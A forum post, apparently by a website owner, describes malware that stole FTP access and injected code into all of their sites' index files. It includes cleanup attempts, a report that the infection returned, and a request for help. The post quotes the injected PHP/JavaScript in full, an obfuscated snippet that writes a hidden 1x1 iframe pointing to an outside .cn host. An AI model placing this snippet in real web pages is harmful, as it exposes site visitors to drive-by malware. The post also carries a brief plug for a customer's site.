Yes, that is the same code that i got on all my websites.
It was a virus i downloaded and it corrupted my computer, i initially got the virus and it appered to be PC Security 2009 . You can go here to get removal instruction, just use malwarebytes.

Anyhow, this virus got all my websites in my filezilla and added this code to my webpages

"<?php echo ''; ?><?php echo '<script>document.write("<i" +"fra" +"me "+ "s" +"r" +"c=http:" +"/" +"/"+ "u"+ "pdate" +"d" +"a" +"te." +"c" +"n" +"/" +" h" +"e" +"i" +"ght=1 " +"wid" +"t" +"h=1" +"><" +"/ifr"+ "am"+ "e" +">")</script>'; ?>"

It added the code to all me index files. If you remove it from the index files make sure to remove it from every index file or it will just add the code again.

What i did was just reload my site from a backup i had and overwrote all my files. That solved the problem.
Ou and make sure to change your ftp password.

You can now visit one of my customers site which is spyware free.
Spa Ionic

Hope this helped. Good luck to all.

IT wont stop,it came back again.

I transferred all my files to my computer from my server.
I opened all my index files from my computer and none of them had the malicious code.
I opened the files from my server and they all had the code.

So when i transfered them somehow my firewall, or virus scan removed all the malicious code from the index files.

So i overwrote all my files on the server and was clean, excited and ready to go.

4 hours later my index file was updated again with the malicious code.
I changed my ftp password, and i uploaded a whole set of new files, and i checked with multiple virus scanners such as nod 32, malware bytes, and spyhunter, all of them turned up nothing.

Does anyone have a clue on how to get rid of this once and for good?

Thanks

Another site that i had the same problem with had only one index file and i removed the code from there after which i have had no problems.
